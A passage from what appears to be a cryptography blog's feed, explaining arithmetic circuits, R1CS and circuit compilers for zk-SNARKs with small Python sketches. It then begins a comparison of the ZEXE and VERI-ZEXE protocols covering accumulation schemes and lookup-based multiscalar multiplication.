&lt;p&gt;We don’t want to write down the circuit corresponding to a program every time we want to code something. Doing this would be like writing code in assembly language or machine code instead of using a higher-level language. To avoid this, we need to construct a dedicated compiler, which reads our code and transforms it into an arithmetic circuit. We will see that some operations lead to a straightforward representation as arithmetic circuits (such as the addition or multiplication of integers). In contrast, other simple functions, such as XOR, AND, or equality checks, have a more complex structure.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;arithmetic-circuits&quot;&gt;Arithmetic circuits&lt;&#x2F;h2&gt;
&lt;p&gt;An arithmetic circuit is a directed acyclic graph involving the multiplication and addition of numbers. We can think of it as evaluating some polynomial over those numbers. For example, the circuit below expresses the calculation of the polynomial \( p(x) = x^3 + x^2 + 1 \)&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;ruVa3AS.jpg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;br &#x2F;&gt;
We can also have circuits taking different values and representing a multivariate polynomial, such as \( p(x_1,x_2) = x_1 x_2 + x_1 + x_2^2\).&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;Ky9wLuo.jpg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Arithmetic circuits can also be expressed as rank-one constraint systems; there is a one-to-one correspondence between the two.&lt;&#x2F;p&gt;
&lt;p&gt;As we mentioned, the only operations we have are addition and multiplication; operations such as division have to be simulated. For example, if we want to perform&lt;br &#x2F;&gt;
\[ a&#x2F;b=c\]&lt;br &#x2F;&gt;
we can introduce an additional variable (the multiplicative inverse of \( b \), that is, \( b^{-1}\)),&lt;br &#x2F;&gt;
\(x\times b=1 \)&lt;br &#x2F;&gt;
\(a\times x=c \)&lt;br &#x2F;&gt;
The first condition ensures that \( x \) is \( b^{-1} \), and the second performs the calculation we wanted. The arithmetic circuit would look like&lt;br &#x2F;&gt;
&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;TrjZGXD.jpg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;br &#x2F;&gt;
We could also have computed this by recalling that the multiplicative inverse of a field element (using modular arithmetic) is \( b^{-1} = b^{p-2} \). However, this leads to a more complex circuit since we would have to evaluate, in general, a large power, which needs many multiplication gates, even if done efficiently (of the order of \( \log(p) \)). Therefore, when trying to express a non-native operation over arithmetic circuits, we must think about the most efficient way.&lt;&#x2F;p&gt;
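&lt;p&gt;The two-constraint division gadget can be sketched concretely (our own toy values over \( \mathbb{F}_{97} \); the prover supplies the inverse as a hint witness):&lt;&#x2F;p&gt;

```python
# Simulate a/b = c with two multiplication constraints and an auxiliary
# witness x = b^{-1}, as in the circuit above.
p = 97
a, b = 30, 6
x = pow(b, p - 2, p)           # hint: the prover computes b^{-1} off-circuit
c = a * x % p

assert x * b % p == 1          # constraint 1: x really is b's inverse
assert a * x % p == c          # constraint 2: c is the quotient
assert c * b % p == a          # sanity check: c behaves like a/b
```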
&lt;h2 id=&quot;r1cs&quot;&gt;R1CS&lt;&#x2F;h2&gt;
&lt;p&gt;A (quadratic) rank-one constraint system is a system of equations of the form:&lt;br &#x2F;&gt;
\( \left(a_{01}+\sum a_{k1} x_k\right)\left(b_{01}+\sum b_{k1} x_k\right)=\left(c_{01}+\sum c_{k1} x_k\right) \)&lt;br &#x2F;&gt;
\( \left(a_{02}+\sum a_{k2} x_k\right)\left(b_{02}+\sum b_{k2} x_k\right)=\left(c_{02}+\sum c_{k2} x_k\right) \)&lt;br &#x2F;&gt;
\( \vdots \)&lt;br &#x2F;&gt;
\( \left(a_{0n}+\sum a_{kn} x_k\right)\left(b_{0n}+\sum b_{kn} x_k\right)=\left(c_{0n}+\sum c_{kn} x_k\right) \)&lt;&#x2F;p&gt;
&lt;p&gt;The number \( n \) gives the total number of constraints in the system. We can show that any bounded computation can be expressed as an R1CS. What happens if we want to perform computations involving something like \( y^5 \)? We can use a simple approach known as flattening. We introduce new variables for the intermediate computations:&lt;br &#x2F;&gt;
\( y\times y=y_1=y^2\)&lt;br &#x2F;&gt;
\( y\times y_1=y_2=y^3 \)&lt;br &#x2F;&gt;
\( y_1 \times y_2= y_3=y^5 \)&lt;br &#x2F;&gt;
For this simple calculation, the vector \( x \) is simply \( x=(y,y_1,y_2,y_3) \). Most of the elements \( a_{ij},b_{ij},c_{ij} \) are zero. The non-zero elements are \( a_{11},b_{11},c_{21},a_{12},b_{22},c_{32},a_{23},b_{33},c_{43}\), which are all equal to one. We could also express the R1CS as&lt;br &#x2F;&gt;
\(y\times y=y_1 \)&lt;br &#x2F;&gt;
\(y_1\times y_1=y_2 \)&lt;br &#x2F;&gt;
\(y\times y_2=y_3 \)&lt;br &#x2F;&gt;
Both represent the same calculation, but the constraints look a bit different. Therefore, there can be multiple representations for a given problem.&lt;&#x2F;p&gt;
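&lt;p&gt;Both flattenings are easy to check on a concrete witness (our own toy sketch over \( \mathbb{F}_{97} \)):&lt;&#x2F;p&gt;

```python
# Flattening y^5 into quadratic constraints, two equivalent ways.
p = 97
y = 3

# first flattening: y*y = y1, y*y1 = y2, y1*y2 = y3
y1 = y * y % p                 # y^2
y2 = y * y1 % p                # y^3
y3 = y1 * y2 % p               # y^5
assert y3 == pow(y, 5, p)

# alternative flattening: y*y = z1, z1*z1 = z2, y*z2 = z3
z1 = y * y % p                 # y^2
z2 = z1 * z1 % p               # y^4
z3 = y * z2 % p                # y^5
assert z3 == y3                # same result, different constraints
```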
&lt;p&gt;R1CS keeps track of the values involved in the calculation and the relationships between the variables. We have a deciding function to check whether or not a given assignment of the variables \( x \) satisfies the R1CS. We have to substitute the values of \( x \) into the system of equations and check that the right- and left-hand sides are equal. Equivalently,&lt;br &#x2F;&gt;
\( \left(a_{01}+\sum a_{k1} x_k\right)\left(b_{01}+\sum b_{k1} x_k\right)-\left(c_{01}+\sum c_{k1} x_k\right)=0 \)&lt;br &#x2F;&gt;
\( \left(a_{02}+\sum a_{k2} x_k\right)\left(b_{02}+\sum b_{k2} x_k\right)-\left(c_{02}+\sum c_{k2} x_k\right)=0 \)&lt;br &#x2F;&gt;
\( \vdots \)&lt;br &#x2F;&gt;
\( \left(a_{0n}+\sum a_{kn} x_k\right)\left(b_{0n}+\sum b_{kn} x_k\right)-\left(c_{0n}+\sum c_{kn} x_k\right)=0 \)&lt;&#x2F;p&gt;
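&lt;p&gt;The deciding function is a straightforward loop (our own sketch; the representation of each constraint as a constant plus coefficient row is a convention we chose for illustration, applied here to the \( y^5 \) flattening from above):&lt;&#x2F;p&gt;

```python
# R1CS deciding function: an assignment x satisfies the system when
# (a0 + <a, x>) * (b0 + <b, x>) - (c0 + <c, x>) = 0 for every constraint.
p = 97

def satisfies(A, B, C, x):
    """Each of A, B, C is a list of (constant, coefficient-row) pairs."""
    for (a0, a), (b0, b), (c0, c) in zip(A, B, C):
        lhs = (a0 + sum(ai * xi for ai, xi in zip(a, x))) % p
        rhs = (b0 + sum(bi * xi for bi, xi in zip(b, x))) % p
        out = (c0 + sum(ci * xi for ci, xi in zip(c, x))) % p
        if lhs * rhs % p != out:
            return False
    return True

# the y^5 flattening: x = (y, y1, y2, y3), with y*y=y1, y*y1=y2, y1*y2=y3
A = [(0, [1, 0, 0, 0]), (0, [1, 0, 0, 0]), (0, [0, 1, 0, 0])]
B = [(0, [1, 0, 0, 0]), (0, [0, 1, 0, 0]), (0, [0, 0, 1, 0])]
C = [(0, [0, 1, 0, 0]), (0, [0, 0, 1, 0]), (0, [0, 0, 0, 1])]

y = 3
assert satisfies(A, B, C, [y, y**2 % p, y**3 % p, y**5 % p])
assert not satisfies(A, B, C, [y, y**2 % p, y**3 % p, 1])  # bad witness
```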
&lt;p&gt;One advantage of R1CS stems from its modularity. If we have two systems of constraints, \( CS_1, CS_2 \), we can obtain a new one \( CS_3 \) which has to satisfy both systems.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;compilers&quot;&gt;Compilers&lt;&#x2F;h2&gt;
&lt;p&gt;We have seen that circuits and R1CS have a modularity property, allowing us to derive more complex circuits or systems of equations by combining simpler ones. We can leverage this by developing a compiler that generates the circuits&#x2F;constraints associated with each data type and associated operations.&lt;&#x2F;p&gt;
&lt;p&gt;The native elements for arithmetic circuits are the &lt;a href=&quot;&#x2F;math-survival-kit-for-developers&#x2F;&quot;&gt;field elements&lt;&#x2F;a&gt;, that is, \( 0,1,2,3,…,p-1 \), which we can also interpret as \( -p&#x2F;2+1,-p&#x2F;2+2,…,0,1,2,…p&#x2F;2 \), and the operations \( + \) and \( \times \). Data types such as &lt;code&gt;u8&lt;&#x2F;code&gt;, &lt;code&gt;u16&lt;&#x2F;code&gt;, &lt;code&gt;u64&lt;&#x2F;code&gt;, and &lt;code&gt;i128&lt;&#x2F;code&gt; are not native and have to satisfy specific properties. Likewise, we have to express their operations in terms of arithmetic circuits. For example, &lt;code&gt;u16&lt;&#x2F;code&gt; is an integer value between 0 and 65535, much smaller than the field elements’ range. If we want such a data type, we must perform a range check to ensure that the value is between 0 and 65535. This condition adds overhead since we have to add constraints to the circuit associated with the range check.&lt;&#x2F;p&gt;
&lt;p&gt;Boolean variables also face similar problems. In ordinary circuits, a boolean is directly associated with one bit, and operations between bits have been optimized for performance. If we want to represent a boolean variable, which takes as values only 0 and 1, we have to add constraints to enforce these values. One simple way to ensure this is by having the variable \( b \) satisfy the following equation&lt;br &#x2F;&gt;
\( b(1-b)=0\)&lt;br &#x2F;&gt;
The arithmetic circuit associated with this equation is shown below and displays three gates: two multiplications and one addition.&lt;br &#x2F;&gt;
&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;qGxf87H.jpg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;If we want to calculate \( c= \neg b \), we need to know how to represent NOT in circuit form first. The following equation can represent this&lt;br &#x2F;&gt;
\[ c=1-b \]&lt;br &#x2F;&gt;
The circuit representation is,&lt;br &#x2F;&gt;
&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;CeoYeMi.jpg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;br &#x2F;&gt;
If we do a naïve pasting of both circuits, we get&lt;br &#x2F;&gt;
&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;4z3zqbU.jpg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;br &#x2F;&gt;
We see that there are a lot of repeated elements (such as \( 1, -1, -b \)). In a later stage, we could optimize the circuit not to introduce redundant elements or computations, as these only increase the proving time.&lt;&#x2F;p&gt;
&lt;p&gt;Suppose we want to represent an integer \( k \) in its bit representation (say &lt;code&gt;u16&lt;&#x2F;code&gt;). In that case, we have 16 bits, \( b_k \), each of which has the same circuit (meaning we have 32 multiplication and 16 addition gates), plus additional checks showing the following:&lt;br &#x2F;&gt;
\[ k=\sum_{j=0}^{15} 2^jb_j \]&lt;br &#x2F;&gt;
Bitwise operations, such as AND, XOR, and NOT, cannot be represented by a single gate. If we want to perform \(a \oplus b \) naïvely (XORing two bitstrings, which is something you would typically do in a &lt;a href=&quot;&#x2F;symmetric-encryption&#x2F;&quot;&gt;stream cipher&lt;&#x2F;a&gt; such as ChaCha20), we need to represent the following:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Each bitstring.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The check that those bits represent \\( a,b \\)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The circuits for each XOR operation.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
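&lt;p&gt;The bit decomposition and booleanity checks described above can be sketched directly (our own toy check with plain Python integers and an arbitrary &lt;code&gt;u16&lt;&#x2F;code&gt; value):&lt;&#x2F;p&gt;

```python
# A u16 witness: 16 boolean-constrained bits b_j plus the recomposition
# constraint k = sum_j 2^j * b_j.
k = 51966                        # an arbitrary u16 value (0xCAFE)
bits = [(k >> j) & 1 for j in range(16)]

for b in bits:
    assert b * (1 - b) == 0      # booleanity: each bit is 0 or 1
assert sum(2**j * bits[j] for j in range(16)) == k  # recomposition check
```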
&lt;p&gt;We can use two solutions to avoid this shortcoming. First, instead of trying to represent each non-arithmetic operation by a combination of field operations, we can create tables that list the valid input&#x2F;output combinations and check the validity of the computation by verifying that the combination appears in the table. For example, we could store the results of XORing all 8-bit strings in a table and then use a lookup argument to check membership. This way, we can reduce the number of constraints, reducing the degree of the resulting polynomials and leading to faster proof generation times.&lt;&#x2F;p&gt;
&lt;p&gt;The second solution is to use new cryptographic functions which are SNARK-friendly. We can say that SNARK-friendly primitives have a simple representation as arithmetic circuits (few constraints can represent them); they usually try to use the native operations in the field. Examples of SNARK-friendly hash functions are Poseidon and Rescue.&lt;&#x2F;p&gt;
&lt;p&gt;Circuit compilers work in phases. In the first phase, the compiler starts with the main function. It begins by replacing functions with their corresponding circuits and adding the necessary variables and the circuits associated with their data types. In the second phase, the input variables are replaced by their actual values and all the intermediate results, getting a solution to the system of constraints.&lt;&#x2F;p&gt;
&lt;p&gt;To translate code into arithmetic circuits, we can implement gadgets. These are simply elements that give the behavior of one of the building blocks of a computational problem. For example, we can implement a gadget to test the equality of two integers or one which performs the concatenation of two strings. Given the modularity property, we can glue everything together and obtain the large circuit. For example, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;arkworks-rs&quot;&gt;Arkworks&lt;&#x2F;a&gt; gives tools to transform code into R1CS using gadgets.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;The integrity of a given computation can be expressed as the satisfiability or solution of an NP-complete problem, such as arithmetic circuit satisfiability. To that end, we transform the entire computation into an arithmetic circuit, where the native elements are field elements (instead of bits), and the addition and multiplication of field elements are the natural operations in the circuit. We can equivalently express circuits as constraint systems, such as R1CS. Given the modularity property of circuits and R1CS, we can leave the transformation of code into circuits to a dedicated compiler, which takes every data type and its operations and transforms them into circuit form. All non-native data types and their operations have to be defined in terms of the native elements and operations, which makes certain operations, such as bitwise AND, XOR, and NOT, expensive. This translation, in turn, makes well-established cryptographic primitives expensive for zk-SNARKs, as each function adds many constraints. The development of new, SNARK-friendly primitives and lookup tables can help reduce the complexity of the circuit representation and speed up proof generation.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Decentralized private computation: ZEXE and VERI-ZEXE</title>
          <pubDate>Fri, 13 Jan 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/decentralized-private-computations-zexe-and-veri-zexe/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/decentralized-private-computations-zexe-and-veri-zexe/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/decentralized-private-computations-zexe-and-veri-zexe/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;The &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2018&#x2F;962.pdf&quot;&gt;ZEXE&lt;&#x2F;a&gt; (Zero-knowledge EXEcution) protocol appeared in 2018, introducing the cryptographic primitive of decentralized private computation (DPC). It aims to solve two main drawbacks that decentralized ledgers suffer: privacy and scalability.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s take the examples of Bitcoin and Ethereum. We see that the history of all transactions is public (which could leak sensitive information on your company’s suppliers, acquaintances, or the services you hire). Ethereum offers programmability but requires each node to execute every operation, where the least powerful device acts as a bottleneck. ZCash tackles the privacy problem but does not offer programmability, just private transactions. ZEXE tries to get the best of both worlds:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Privately running arbitrary programs.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Being able to run computations offline.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Providing proof of the integrity of the computations, which nodes can verify quickly.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;For an overview of the protocol, we recommend our previous post on &lt;a href=&quot;&#x2F;fully-private-applications-a-zexe-protocol&#x2F;&quot;&gt;ZEXE&lt;&#x2F;a&gt;. As a quick reminder, the protocol offers the following features:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Programmability: we can run arbitrary programs.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Fast verification: we can prove the validity of our computations by using zk-SNARKs (zero-knowledge Succinct Non-interactive ARguments of Knowledge), which offer short (succinct) proofs that verifiers can check on-chain in a few milliseconds.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Data and function privacy: the protocol hides relevant input information and functions when we execute transitions in the ledger.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The ZEXE protocol has seen several improvements since its introduction to enhance its performance. This post will analyze the differences between the original protocol and a recent proposal, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2022&#x2F;802.pdf&quot;&gt;VERI-ZEXE&lt;&#x2F;a&gt;. The authors of VERI-ZEXE compared their protocol’s performance with the original proposal of ZEXE and its early modifications. There are no comparisons between the current improved versions of the ZEXE protocol and VERI-ZEXE.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;building-blocks&quot;&gt;Building blocks&lt;&#x2F;h2&gt;
&lt;p&gt;We mentioned that the ZEXE protocol uses zk-SNARKs, which allow us to provide proofs of integrity for given computations, which anyone can verify much faster than the naïve approach of re-execution. The highest cost of the system is related to the generation of the proof, which relies on elliptic curve operations. You can look at the basics of some SNARK systems in &lt;a href=&quot;&#x2F;the-hunting-of-the-zk-snark&#x2F;&quot;&gt;our previous post&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Modern proof systems have two main building blocks: a polynomial interactive oracle proof (PIOP), which transforms a given computation into polynomial equations, and a polynomial commitment scheme (PCS). We get different proving systems depending on our choices, each of which has advantages and disadvantages. Some examples of PIOPs are Marlin, PLONK (Permutations over Lagrange-bases for Oecumenical Noninteractive arguments of Knowledge) and all its derivatives, and Spartan. Among the PCS, we have KZG (Kate-Zaverucha-Goldberg), FRI (Fast Reed-Solomon Interactive Oracle Proofs of Proximity), Bulletproofs, and DARK (Diophantine ARgument of Knowledge), to name a few.&lt;&#x2F;p&gt;
&lt;p&gt;To be able to perform proofs in a fast and efficient way, we need “SNARK-friendly” cryptographic primitives and operations. A function is “SNARK-friendly” if its representation as an arithmetic circuit is small. For example, intuitive and straightforward bitwise operations such as AND and XOR have a complex circuit representation. Therefore, the cost of functions in the context of SNARKs must consider the complexity of the arithmetic circuit used to represent the operation and its variables.&lt;&#x2F;p&gt;
&lt;p&gt;A great deal of the cost in SNARK systems comes from:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Multiscalar multiplication ([MSM](&#x2F;multiscalar-multiplication-strategies-and-challenges&#x2F;)). These are operations of the form \\( Q= \sum_k a_k P_k \\), where \\( a_k \\) are numbers and \\( P_k \\) are points belonging to an elliptic curve.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Elliptic curve pairings. These are used in the verification of some systems. They involve field extensions and operations between different groups of elliptic curves.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Polynomial evaluations over non-native fields.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Fiat-Shamir transform: a hash function is needed to generate the challenges. Many well-established cryptographic primitives have complicated representations as arithmetic circuits, which makes their evaluation costly.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Research efforts are attempting to solve all of these problems. GPUs or FPGA can &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.zprize.io&#x2F;prizes&#x2F;accelerating-msm-operations-on-gpu-fpga&quot;&gt;speed up the calculation of MSM&lt;&#x2F;a&gt;. New hash functions and encryption schemes with nicer arithmetic circuits can further reduce the complexity of frequently used cryptographic primitives (for example, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2019&#x2F;458.pdf&quot;&gt;Poseidon&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;tosc.iacr.org&#x2F;index.php&#x2F;ToSC&#x2F;article&#x2F;view&#x2F;8695&#x2F;8287&quot;&gt;Vision and Rescue&lt;&#x2F;a&gt;).&lt;&#x2F;p&gt;
&lt;h2 id=&quot;veri-zexe-s-choices&quot;&gt;VERI-ZEXE’s choices&lt;&#x2F;h2&gt;
&lt;p&gt;To tackle these problems, VERI-ZEXE changes the proving system and cryptographic primitives. Here are some of the main modifications:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * PLONK as PIOP. Over the last years, PLONK has seen several significant improvements, such as high-degree custom gates, lookup tables, and multilinear polynomials (which avoid the fast Fourier transform), giving rise to variants such as turboPLONK, ultraPLONK, and [hyperPLONK](https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2022&#x2F;1355.pdf).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Lightweight verifier circuit via [accumulation scheme](https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2020&#x2F;499.pdf). The protocol moves out the pairing check from the SNARK circuit and delays the verification to the ledger&amp;#39;s validators.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Instance merging. When performing transactions, birth and death predicates of records have to be checked. Instead of verifying each predicate separately, the protocol leverages that the predicates can be taken in birth&#x2F;death pairs, resulting in a larger predicate. However, since the verification of the combined predicate has a simpler circuit representation (this means that the number of operations does not scale linearly), the overall cost is reduced.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Proof batching. We can generate and verify proofs in batches by exploiting the properties of some PCS, such as KZG. These allow the opening of \\( N \\) different commitments simultaneously, with a cost that does not scale linearly in the number of commitments (that is, you can open \\( N \\) commitments for less than the cost of \\( N \\) separate openings).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Variable base MSM via a lookup table. The MSM is carried out by combining Pippenger&amp;#39;s algorithm (which splits the scalars into blocks) with a [lookup table](https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2020&#x2F;315.pdf), reducing the cost of elliptic curve additions.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Polynomial evaluation over non-native fields. The circuits of the prover and the verifier lie in different finite fields. One way to deal with this was using two pairs of elliptic curves. VERI-ZEXE instead uses modular addition and multiplication with range checks via lookups, resulting in a slightly more complicated circuit.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * SNARK-friendly symmetric primitives. The protocol uses collision-resistant hash functions, pseudorandom generators, and commitment schemes with a smaller circuit representation, which reduces the number of operations and, in turn, memory and time use. For example, the Fiat-Shamir transformation uses the sponge construction of the Rescue permutation.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The use of PLONK and its additions, together with simpler constructions for cryptographic primitives, results in a reduction of more than one order of magnitude in the total number of constraints, which in turn decreases the size of the MSM instances and the overall proving time.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;accumulation-schemes-as-and-incrementally-verifiable-computation-ivc&quot;&gt;Accumulation schemes (AS) and Incrementally verifiable computation (IVC)&lt;&#x2F;h2&gt;
&lt;p&gt;The verification of proofs requires the calculation of costly pairing operations. The original ZEXE protocol used incrementally verifiable computation to prove the satisfiability of user-defined predicates using SNARK recursion: given a computation at step \( N \), the prover would receive the state \( z_{N} \) and a proof \( \pi_{N-1} \) attesting to the correct execution of the previous step. The prover would then execute step \( N \) and generate a proof \( \pi_N \) which certifies that “the new state \( z_{N+1} \) is the result of the correct execution and that \( \pi_{N-1} \) is true (in other words, that the prover did the \( N-1 \) previous steps correctly)”. This last step is where the computational burden comes in: to check the proof, the verifier’s computation is embedded inside the prover’s circuit, which slows down the proof’s generation.&lt;&#x2F;p&gt;
&lt;p&gt;An accumulation scheme proceeds differently by delaying the verification of the final proof to the ledger’s validators. At each step of the calculation, the prover receives the current state and an accumulator, which is partially verified (the prover checks that the accumulation results are correct but does not calculate the elliptic curve pairing operation). The group elements in the accumulator must be masked using a randomizer, which acts as an additional witness (secret input) for the accumulator’s verifier. This masking ensures that the accumulator does not leak information on the computations being carried out.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;lookup-tables-and-efficient-modular-operations&quot;&gt;Lookup tables and efficient modular operations&lt;&#x2F;h2&gt;
&lt;p&gt;Using lookup tables for elliptic curve addition in the Pippenger algorithm and efficient operations for modular arithmetic reduces the number of PLONK constraints by a factor of 6.&lt;&#x2F;p&gt;
&lt;p&gt;The idea behind lookup tables for MSM is as follows: we want to compute&lt;br &#x2F;&gt;
\[ Q= \sum_i a_i P_i \]&lt;br &#x2F;&gt;
The Pippenger algorithm splits the scalars \( a_i \) into \( m \) windows of length \( c \) (for example, a scalar is a 256-bit number, and we choose a window of 8 bits, so \( m = 32 \)). We can write each scalar as&lt;br &#x2F;&gt;
\[ a_i= \sum_j a_{ij}2^{cj}\]&lt;br &#x2F;&gt;
where each \( a_{ij} \) is in the range \( \{0,1,\dots,2^c-1\} \). We can compute, for each point \( P_i \), all possible multiples \( 2P_i,3P_i,4P_i,\dots,(2^c-1)P_i\).&lt;&#x2F;p&gt;
&lt;p&gt;We can now calculate the result \( Q_{ij}=a_{ij}P_i\) by looking at the table (which has a more straightforward description than pure elliptic curve operations) and get the sum for the \( j \)-th window,&lt;br &#x2F;&gt;
\[ B_j = \sum_i Q_{ij} \]&lt;br &#x2F;&gt;
We finally get the result by adding over the \( m \) windows,&lt;br &#x2F;&gt;
\[ Q=\sum_j B_j 2^{cj}\]&lt;&#x2F;p&gt;
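&lt;p&gt;The window decomposition above can be sketched in a few lines. This is our own toy illustration, not VERI-ZEXE code: plain integers with addition stand in for elliptic curve points, and the window size \( c \) and scalar bit length are arbitrary choices.&lt;&#x2F;p&gt;

```python
# Windowed MSM sketch. Integers with + stand in for elliptic curve
# points, so d * P below plays the role of a precomputed table of
# multiples of P. Window size c and bit length are arbitrary.

def msm_windowed(scalars, points, c=8, bits=32):
    m = (bits + c - 1) // c                     # number of windows
    # Lookup table: all multiples 0, P, 2P, ..., (2^c - 1)P per point
    tables = [[d * P for d in range(2 ** c)] for P in points]
    Q = 0
    for j in range(m):
        B_j = 0                                 # j-th window sum
        for i in range(len(scalars)):
            a_ij = (scalars[i] >> (c * j)) % (2 ** c)   # j-th digit
            B_j = B_j + tables[i][a_ij]         # table lookup, no scalar mul
        Q = Q + B_j * (2 ** (c * j))            # Q = sum_j B_j 2^{cj}
    return Q
```

&lt;p&gt;In a real MSM the table entries are elliptic curve points, so each lookup replaces the scalar multiplication \( a_{ij}P_i \) with a single precomputed point.&lt;&#x2F;p&gt;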
&lt;h2 id=&quot;further-improvements-from-hyperplonk&quot;&gt;Further improvements from HyperPlonk?&lt;&#x2F;h2&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;xymqID7.jpg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
